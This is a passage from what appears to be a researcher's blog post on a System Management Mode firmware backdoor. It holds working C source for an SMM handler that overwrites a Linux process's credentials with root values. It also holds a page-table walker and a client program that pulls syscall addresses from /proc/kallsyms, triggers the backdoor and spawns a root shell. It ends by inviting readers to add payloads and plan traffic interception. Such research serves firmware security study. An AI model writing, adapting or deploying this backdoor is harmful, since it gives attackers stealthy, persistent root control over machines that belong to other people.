    switch (Code)
    {
    case BACKDOOR_PRIVESC:
        {
            UINT64 Addr = 0, GsBase = 0;
            int OffsetTaskStruct = 0, OffsetCred = 0;
            unsigned char OffsetCredVal = 0;

            if (Arg1 == 0)
            {
                DbgMsg(__FILE__, __LINE__, "ERROR: Arg1 must be specified\r\n");
                
                Status = EFI_INVALID_PARAMETER;
                goto _end;
            }

            // check that long mode paging is enabled
            if (!Check_IA_32e(ControlRegs))
            {
                DbgMsg(__FILE__, __LINE__, "ERROR: IA-32e paging is not enabled\r\n");
                
                Status = EFI_INVALID_PARAMETER;
                goto _end;
            }

            DbgMsg(__FILE__, __LINE__, "Syscall address is 0x%llx\r\n", Arg1);

            // get physical address of syscall
            if ((Status = VirtualToPhysical(Arg1, &Addr, ControlRegs->Cr3)) == EFI_SUCCESS)
            {                
                /*
                    User mode program (smm_call) passing sys_getuid/euid/gid/egid
                    function address in 1-st argument, we need to analyse it's code
                    and get offsets to task_struct, cred and uid/euid/gid/egid fields.
                    Then we just set filed value to 0 (root).

                    sys_getuid code as example:

                        mov    %gs:0xc700, %rax   ; get task_struct
                        mov    0x388(%rax), %rax  ; get task_struct->cred
                        mov    0x4(%rax), %eax    ; get desired value from cred
                        retq
                */
                if (memcmp((void *)(Addr + 0x00), "\x65\x48\x8b\x04\x25", 5) ||
                    memcmp((void *)(Addr + 0x09), "\x48\x8b\x80", 3) ||
                    memcmp((void *)(Addr + 0x10), "\x8b\x40", 2))
                {
                    DbgMsg(__FILE__, __LINE__, "ERROR: Unexpected binary code\r\n");
                    
                    Status = EFI_INVALID_PARAMETER;
                    goto _end;
                }

                // get fields offsets
                OffsetCredVal = *(unsigned char *)(Addr + 0x12);
                OffsetTaskStruct = *(int *)(Addr + 0x05);
                OffsetCred = *(int *)(Addr + 0x0c);                

                DbgMsg(
                    __FILE__, __LINE__, 
                    "task_struct offset: 0x%x, cred offset: 0x%x, cred value offset: 0x%x\r\n",
                    OffsetTaskStruct, OffsetCred, OffsetCredVal
                );
            }
            else
            {
                DbgMsg(
                    __FILE__, __LINE__, 
                    "ERROR: Unable to resolve physical address for 0x%llx\r\n", Arg1
                );

                goto _end;
            }

            // get GS segment base address
            GsBase = __readmsr(IA32_KERNEL_GS_BASE);            

            DbgMsg(__FILE__, __LINE__, "GS base is 0x%llx\r\n", GsBase);

            // check if GS base points to user-mode
            if ((GsBase >> 63) == 0)
            {
                DbgMsg(__FILE__, __LINE__, "ERROR: Bad GS base\r\n");
                
                Status = EFI_INVALID_PARAMETER;
                goto _end;
            }            

            // get physical address of GS base
            if ((Status = VirtualToPhysical(GsBase, &Addr, ControlRegs->Cr3)) == EFI_SUCCESS)
            {                
                UINT64 TaskStruct = *(UINT64 *)(Addr + OffsetTaskStruct);   

                DbgMsg(__FILE__, __LINE__, "task_struct is at 0x%llx\r\n", TaskStruct);

                // get physical address of task_struct structure
                if ((Status = VirtualToPhysical(TaskStruct, &Addr, ControlRegs->Cr3)) == EFI_SUCCESS)
                {
                    UINT64 Cred = *(UINT64 *)(Addr + OffsetCred);   

                    DbgMsg(__FILE__, __LINE__, "cred is at 0x%llx\r\n", Cred);

                    // get physical address of task_struct->cred structure
                    if ((Status = VirtualToPhysical(Cred, &Addr, ControlRegs->Cr3)) == EFI_SUCCESS)
                    {
                        int *CredVal = (int *)(Addr + OffsetCredVal);

                        DbgMsg(
                            __FILE__, __LINE__, 
                            "Current cred value is %d (setting to 0)\r\n", *CredVal
                        );

                        // set root privilleges
                        *CredVal = 0;
                    }
                    else
                    {
                        DbgMsg(
                            __FILE__, __LINE__, 
                            "ERROR: Unable to resolve physical address for 0x%llx\r\n", Cred
                        );
                    }
                }
                else
                {
                    DbgMsg(
                        __FILE__, __LINE__, 
                        "ERROR: Unable to resolve physical address for 0x%llx\r\n", TaskStruct
                    );
                }
            }
            else
            {
                DbgMsg(
                    __FILE__, __LINE__, 
                    "ERROR: Unable to resolve physical address for 0x%llx\r\n", GsBase
                );
            }
        }
    } 

_end:

    return Status;
}

Backdoor code that implements virtual to physical address translation for IA-32 long mode in according to Intel manuals:
#define PFN_TO_PAGE(_val_) ((_val_) << PAGE_SHIFT)
#define PAGE_TO_PFN(_val_) ((_val_) >> PAGE_SHIFT)

// get MPL4 address from CR3 register value
#define PML4_ADDRESS(_val_) ((_val_) & 0xfffffffffffff000)

// get PML4 indexes from virtual address
#define PML4_INDEX(_addr_) (((_addr_) >> 39) & 0x1ff)
#define PDPT_INDEX(_addr_) (((_addr_) >> 30) & 0x1ff)
#define PDE_INDEX(_addr_) (((_addr_) >> 21) & 0x1ff)
#define PTE_INDEX(_addr_) (((_addr_) >> 12) & 0x1ff)

#define PAGE_OFFSET_4K(_addr_) ((_addr_) & 0xfff)
#define PAGE_OFFSET_2M(_addr_) ((_addr_) & 0x1fffff)

// PS flag of PDPTE and PDE
#define PDPTE_PDE_PS 0x80

#define INTERLOCKED_GET(_addr_) InterlockedCompareExchange64((UINT64 *)(_addr_), 0, 0)

BOOLEAN Check_IA_32e(PCONTROL_REGS ControlRegs)
{
    UINT64 Efer = __readmsr(IA32_EFER);

    /*
        Check that supported IA-32 long mode memory translation mechanisms 
        was enabled when SMI occurs.
    */
    if (!(ControlRegs->Cr0 & CR0_PG))
    {
        DbgMsg(__FILE__, __LINE__, "ERROR: CR0.PG is not set\r\n");
        return FALSE;   
    }

    if (!(ControlRegs->Cr4 & CR4_PAE))
    {
        DbgMsg(__FILE__, __LINE__, "ERROR: CR4.PAE is not set\r\n");
        return FALSE;   
    }

    if (!(Efer & IA32_EFER_LME))
    {
        DbgMsg(__FILE__, __LINE__, "ERROR: IA32_EFER.LME is not set\r\n");
        return FALSE;
    }

    return TRUE;
}
//--------------------------------------------------------------------------------------
EFI_STATUS VirtualToPhysical(UINT64 Addr, UINT64 *Ret, UINT64 Cr3)
{
    UINT64 PhysAddr = 0;
    EFI_STATUS Status = EFI_INVALID_PARAMETER;    

    X64_PAGE_MAP_AND_DIRECTORY_POINTER_2MB_4K PML4Entry;    

    DbgMsg(__FILE__, __LINE__, __FUNCTION__"(): CR3 is 0x%llx, VA is 0x%llx\r\n", Cr3, Addr);

    // get PML4 table entry of given virtual address
    PML4Entry.Uint64 = INTERLOCKED_GET(PML4_ADDRESS(Cr3) + PML4_INDEX(Addr) * sizeof(UINT64));

    DbgMsgMem(
        __FILE__, __LINE__, "PML4E is at 0x%llx[0x%llx]: 0x%llx\r\n", 
        PML4_ADDRESS(Cr3), PML4_INDEX(Addr), PML4Entry.Uint64
    );

    // check that entry is present
    if (PML4Entry.Bits.Present)
    {
        X64_PAGE_MAP_AND_DIRECTORY_POINTER_2MB_4K PDPTEntry;

        // get PDPTE of given virtual address
        PDPTEntry.Uint64 = INTERLOCKED_GET(PFN_TO_PAGE(PML4Entry.Bits.PageTableBaseAddress) + 
                                           PDPT_INDEX(Addr) * sizeof(UINT64));

        DbgMsg(
            __FILE__, __LINE__, "PDPTE is at 0x%llx[0x%llx]: 0x%llx\r\n", 
            PFN_TO_PAGE(PML4Entry.Bits.PageTableBaseAddress),
            PDPT_INDEX(Addr), PDPTEntry.Uint64
        );
 
        // check that entry is present
        if (PDPTEntry.Bits.Present)
        {
            // check for page size flag
            if ((PDPTEntry.Uint64 & PDPTE_PDE_PS) == 0)
            {
                X64_PAGE_DIRECTORY_ENTRY_4K PDEntry;

                // get PDE of given virtual address for less than 1Gbyte pages
                PDEntry.Uint64 = INTERLOCKED_GET(PFN_TO_PAGE(PDPTEntry.Bits.PageTableBaseAddress) +
                                                 PDE_INDEX(Addr) * sizeof(UINT64));

                DbgMsg(
                    __FILE__, __LINE__, "PDE is at 0x%llx[0x%llx]: 0x%llx\r\n", 
                    PFN_TO_PAGE(PDPTEntry.Bits.PageTableBaseAddress), PDE_INDEX(Addr), 
                    PDEntry.Uint64
                );

                // check that entry is present
                if (PDEntry.Bits.Present)
                {
                    // check for page size flag
                    if ((PDEntry.Uint64 & PDPTE_PDE_PS) == 0)
                    {
                        X64_PAGE_TABLE_ENTRY_4K PTEntry;

                        // get PDE of given virtual address for 4Kbyte pages
                        PTEntry.Uint64 = INTERLOCKED_GET(PFN_TO_PAGE(PDEntry.Bits.PageTableBaseAddress) +
                                                         PTE_INDEX(Addr) * sizeof(UINT64));

                        DbgMsg(
                            __FILE__, __LINE__, "PTE is at 0x%llx[0x%llx]: 0x%llx\r\n", 
                            PFN_TO_PAGE(PDEntry.Bits.PageTableBaseAddress), PTE_INDEX(Addr), 
                            PTEntry.Uint64
                        );

                        // check that entry is present
                        if (PTEntry.Bits.Present)
                        {
                            // get desired physical address
                            PhysAddr = PFN_TO_PAGE(PTEntry.Bits.PageTableBaseAddress) +
                                       PAGE_OFFSET_4K(Addr);

                            Status = EFI_SUCCESS;
                        }
                        else
                        {
                            DbgMsg(
                                __FILE__, __LINE__, 
                                "ERROR: PTE for 0x%llx is not present\r\n", Addr
                            );
                        }
                    }
                    else
                    {
                        // get desired physical address for 2Mbyte pages
                        PhysAddr = PFN_TO_PAGE(PDEntry.Bits.PageTableBaseAddress) +
                                   PAGE_OFFSET_2M(Addr);

                        Status = EFI_SUCCESS;
                    }
                }
                else
                {
                    DbgMsg(
                        __FILE__, __LINE__, 
                        "ERROR: PDE for 0x%llx is not present\r\n", Addr
                    );
                }                     
            }
            else
            {
                DbgMsg(__FILE__, __LINE__, "ERROR: 1Gbyte page\r\n");
            }
        }
        else
        {
            DbgMsg(__FILE__, __LINE__, "ERROR: PDPTE for 0x%llx is not present\r\n", Addr);
        }
    }
    else
    {
        DbgMsg(__FILE__, __LINE__, "ERROR: PML4E for 0x%llx is not present\r\n", Addr);
    }

    if (Status == EFI_SUCCESS)
    {
        DbgMsg(__FILE__, __LINE__, "Physical address of 0x%llx is 0x%llx\r\n", Addr, PhysAddr);

        if (Ret)
        {            
            // return resolved physical address to caller
            *Ret = PhysAddr;
        }
    }

    return Status;
}

Here’s the updated client code that gets required syscall function addresses from /proc/kallsyms pseudo-file and calls the backdoor with privileges escalation command number as argument using smm_call():
#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <sched.h>
#include <errno.h>
#include <string.h>
#include <inttypes.h>
#include <unistd.h>

#define MAX_COMMAND_LEN 0x200

// backdoor command number
#define BACKDOOR_PRIVESC 8 

// external function implemented in assembly
extern int smm_call(long code, unsigned long long arg1, unsigned long long arg2);

int main(int argc, char *argv[])
{
    int ret = 0;    
    cpu_set_t mask;

    CPU_ZERO(&mask);
    CPU_SET(0, &mask);

    ret = sched_setaffinity(0, sizeof(mask), &mask);
    if (ret != 0)
    {
        printf("sched_setaffinity() ERROR %d\n", errno);
        return errno; 
    }

    if (argc >= 2 && !strcmp(argv[1], "--privesc"))
    {
        if (argc >= 3)
        {
            int i = 0;            

            for (i = 2; i < argc; i += 2)
            {
                unsigned long long addr = 0;
                char *func = argv[i + 1];
 
                // parse syscall address that was passed to the program by itself using cat + grep
                if ((addr = strtoull(argv[i], NULL, 16)) == 0 && errno == EINVAL)
                {
                    printf("strtoull() ERROR %d\n", errno);
                    return errno; 
                }

                if (addr == 0)
                {
                    printf("ERROR: Unable to resolve %s() address\n", func);
                    return EINVAL;
                }

                printf("%s() address is 0x%llx...\n", func, addr);            

                // call target syscalls code to be sure that it's not swapped out by kernel
                getuid();
                getgid();
                geteuid();            
                getegid();

                // ask the backdoor to set cred field value to 0
                ret = smm_call(BACKDOOR_PRIVESC, addr, 0);

                if (ret != 0)
                {
                    printf("ERROR: Backdoor returns 0x%x\n", ret);
                    return ret;
                }
            }            

            // check for root privileges
            if (getuid() == 0 && geteuid() == 0 &&
                getgid() == 0 && getegid() == 0)
            {
                printf("SUCCESS\n");
 
                // run command shell
                execl("/bin/sh", "sh", NULL);
            } 
            else
            {
                printf("FAILS\n");
                return EINVAL;
            }
        }
        else
        {            
            int i = 0, code = 0;
            char command[MAX_COMMAND_LEN];

            /* 
                Find desired syscalls addresses in /proc/kallsyms and pass them 
                to the same program via command line arguments.
            */

            char *functions[] = { "sys_getuid", "sys_geteuid", 
                                  "sys_getgid", "sys_getegid", NULL };                                              

            printf("Getting root...\n");

            sprintf(command, "%s --privesc ", argv[0]);

            for (i = 0; functions[i]; i++)
            {
                char *func = functions[i];            

                sprintf(
                    command + strlen(command), 
                    "0x`cat /proc/kallsyms | grep '%s$' | awk '{print $1}'` %s ", func, func
                );                
            }    
            
            code = system(command);
            if (code != 0)
            {
                printf("ERROR: Command \"%s\" returns 0x%x\n", command, code);
                return code;
            }       
        }
    }
    else
    {
        // ... skipped ...
    }

    return ret;
}

Now, when we compiles this backdoor client and runs the binary with --privesc argument — it gives us the root shell. Example of privileges escalation usage on Debian Wheezy with 3.2.60 kernel (on top console window you can see SMI dispatch debug messages that was received from backdoor via COM port):



Conclusion


It's hard to detect such nice SMM backdoor form running operating system, SMRAM is not accessible and everything that it's possible to do in easy way — check the hardware configuration for suspicious SPI sources enabled that normally not used by firmware (like APIC timers, etc.). However, it's a good theme for another tool and another post.

Is there any chances to meet any SMM malware in real world? Well, they're greater that zero, for example, leaked NSA documents mentions the SOUFFLETROUGH project — BIOS implant for Juniper firewalls that uses advantages of SMM to hide it's code from OS.

As for the my SMM backdoor improvements — it's definitely interesting to implement a network traffic interception and injection. I believe, that it will be not very hard to achieve this with the hooking of NIC driver execution flow using I/O instruction restart CPU feature — I'm planning to dig into this direction in some future.

End of the story. Download the source code, test backdoor on your own hardware, add some custom payloads, have fun and tell people about your findings :)